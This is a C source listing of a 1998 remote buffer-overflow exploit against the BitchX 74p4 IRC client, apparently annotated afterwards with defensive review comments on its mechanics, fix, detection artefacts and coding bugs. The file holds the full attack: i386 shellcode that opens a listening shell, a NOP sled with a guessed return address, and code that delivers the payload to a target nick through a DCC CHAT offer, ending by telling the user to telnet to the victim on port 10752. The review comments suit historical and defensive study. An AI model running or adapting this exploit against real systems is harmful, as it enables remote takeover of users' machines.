/*
 * BitchX 74p4 remote overflow
 * BiT '98, shellcode by plaguez/ndubee
 *
 * Vulnerability originally discovered by nyt (nyt@deadpig.org),
 * rediscovered by an unknown user.
 */

/*
 * Review notes (defensive reading of a 1998 exploit listing):
 *
 * Historical proof-of-concept against the DCC CHAT handling of BitchX 74p4.
 * main() builds an oversized line (0x90-filled buffer, shellcode placed so
 * it ends at BUFSIZE, then a repeated hard-coded stack address) and
 * attack() delivers it: register on an IRC server, send a CTCP "DCC CHAT"
 * offer to the target nick, accept the callback connection, write the line.
 * Vulnerability class: stack buffer overflow with a guessed fixed return
 * address, i.e. pre-ASLR/pre-stack-protector era.  The client-side fix is
 * bounded handling of DCC request data; for detection, the observable
 * artefacts are the DCC CHAT offer followed by a ~2 KB line on the DCC
 * connection.
 *
 * As extracted this file cannot compile: the four #include directives lost
 * their header names (the code uses stdio, stdlib, string, time, socket and
 * inet functions), and the two usage strings appear to have lost their
 * argument placeholders (likely angle-bracketed text stripped by
 * extraction); runtime strings are left exactly as found.
 */
#include
#include
#include
#include

#define PORT 6667      /* IRC server port used by attack() */
#define BUFSIZE 2068   /* bytes of sled+shellcode before the return addresses */

/*
 * Shellcode: opaque i386 Linux machine code, not decoded in this review.
 * The copy loop in main() advances this global pointer to its terminator,
 * so the string is effectively single-use.
 */
char *ops =
    "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x4c\xeb\x4c\x5e\xb0\x02\x89"
    "\x06\xfe\xc8\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe"
    "\xc3\x89\xf1\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66"
    "\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10"
    "\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66"
    "\xb3\x04\xcd\x80\xeb\x04\xeb\x4a\xeb\x50\x31\xc0\x89\x46\x04\x89"
    "\x46\x08\xb0\x66\xfe\xc3\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80"
    "\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb8\x2f\x62\x69"
    "\x6e\x89\x06\xb8\x2f\x73\x68\x21\x89\x46\x04\x31\xc0\x88\x46\x07"
    "\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5d\xff\xff\xff";

/*
 * Build the payload and hand it to attack().
 *
 * argv[1] is "nick@server" (split at the '@' inside attack()), argv[2] is
 * the IP advertised in the DCC CHAT request, and optional argv[3] is a
 * decimal offset subtracted from the hard-coded stack address `base`.
 *
 * Payload layout in p (1 + len bytes allocated, len = BUFSIZE + 2*sizeof(char *)):
 *   [0x90 sled ...][shellcode, last byte at p+BUFSIZE-1][base-offset, twice][\n][\0]
 *
 * `void main` is non-standard; attack() is called before any declaration
 * of it is visible (implicit declaration, an error on modern compilers).
 */
void main(int argc, char **argv) {
    /* i is a char used as a byte index relative to q; it only reaches 9. */
    char *p, *q, i = 0;
    /* The (char) cast binds to the 2 only, so len == BUFSIZE + 2*sizeof(char *). */
    int *addr, len = BUFSIZE + (char) 2*sizeof(char *);
    int base = 0xBFFFF5C6;   /* guessed i386 Linux stack address of the era */
    int offset = 0;

    if(argc < 3)
        printf("Syntax: %s @ \n", *argv), exit(0);
    if(argc > 3)
        offset = atoi(argv[3]);   /* atoi: no error reporting on bad input */
    if(!strchr(argv[1], '@'))
        printf("Syntax: %s @ \n", *argv), exit(0);

    /* malloc() result is not checked before use. */
    q = p = (char *) malloc(1 + len);
    memset(p, 0x90, 1 + len);   /* fill the whole buffer with 0x90 first */
    /* Copy the shellcode so that q ends up exactly at p + BUFSIZE; this
     * walks the global `ops` pointer to its terminator. */
    for(q = (p + BUFSIZE - strlen(ops)); *ops; *q++ = *ops++)
        ;
    /* Write 2*sizeof(char *) bytes of the guessed address as ints, i.e. two
     * copies when sizeof(char *) == 4 (the intended 32-bit target). */
    for(addr = (int *) q; i < 2*sizeof(char *); i += 4)
        *(addr++) = base - offset;
    /* Line terminator for the DCC line, then NUL so strlen()/write() work.
     * NOTE(review): by my count q + 9 == p + BUFSIZE + 9, one byte past the
     * 1 + len allocation whose last valid index is BUFSIZE + 8. */
    *(q + i++) = '\n';
    *(q + i) = '\0';
    /* This format string was split across two lines in the extracted copy
     * and is rejoined here without changing its text.  %d with a size_t
     * strlen() result is a format mismatch. */
    printf("Attacking.. %d using %X[%d]\n", strlen(p), base - offset, offset);
    fflush(stdout);
    attack(argv[1],argv[2], p);
    free(p);
}

/*
 * Deliver the payload.
 *
 * stuff: "nick@server"; the '@' is overwritten with '\0' in place, after
 *        which stuff is the nick and ser the server address string.
 * ip:    dotted-quad address advertised in the DCC CHAT request.
 * b:     NUL-terminated payload built by main(); written once to the first
 *        peer that connects to the listening socket.
 *
 * Sequence: connect to ser:PORT, send USER/NICK registration, send a CTCP
 * DCC CHAT offer pointing back at ip:pp, bind/listen on pp, accept one
 * connection, write the payload, close all three sockets.  No socket call
 * except connect() has its return value checked.
 */
void attack(char *stuff, char *ip, char *b) {
    int s, l, a, i = sizeof(struct sockaddr_in), pp;
    struct sockaddr_in sin;   /* never zeroed; sin_zero stays uninitialised */
    char buf[512], *ser;
    unsigned long int ll;

    /* Split "nick@server" in place; main() already verified the '@'. */
    ser = strchr(stuff, '@');
    *ser++ = '\0';

    sin.sin_family = AF_INET;
    sin.sin_port = htons(PORT);
    sin.sin_addr.s_addr = inet_addr(ser);   /* INADDR_NONE on failure, unchecked */
    /* inet_addr() returns network byte order; htonl() of that presumably
     * yields the host-order integer the DCC CHAT address field carries
     * (true on a little-endian host). */
    ll = htonl(inet_addr(ip));
    /* Port offered to the target.  rand() returns an int; htons() below
     * keeps only its low 16 bits while the PRIVMSG prints the full value,
     * so the two can disagree. */
    srand(time(NULL));
    pp = rand();

    s = socket(AF_INET, SOCK_STREAM, 0);
    /* &sin passed without the (struct sockaddr *) cast. */
    if(connect(s, &sin, sizeof(sin)) == -1)
        printf("Can't connect to ircserver\n"), exit(0);
    strcpy(buf, "USER A A A A\n");
    write(s, buf, strlen(buf));
    strcpy(buf, "NICK _bit_\n");
    write(s, buf, strlen(buf));
    /* CTCP framing is \001...\001.  sprintf() into buf[512] is unbounded
     * with respect to the caller-supplied nick, and %u with an unsigned
     * long is only consistent on a 32-bit ABI. */
    sprintf(buf, "PRIVMSG %s :%cDCC CHAT chat %u %d%c\n", stuff, '\001', ll, pp, '\001');
    write(s, buf, strlen(buf));

    /* Reuse sin as the listening address: any interface, port pp. */
    sin.sin_port = htons(pp);
    sin.sin_addr.s_addr = INADDR_ANY;
    l = socket(AF_INET, SOCK_STREAM, 0);
    bind(l, &sin, sizeof(sin));
    listen(l, 5);
    printf("Wating for connection...");
    fflush(stdout);
    /* i (an int) is passed where a socklen_t * is expected. */
    a = accept(l, &sin, &i);
    /* The oversized line goes to whoever connected; no partial-write handling. */
    write(a, b, strlen(b));
    sleep(1);
    close(s);
    close(l);
    close(a);
    printf("now telnet to %s's ip port 10752\n", stuff);
}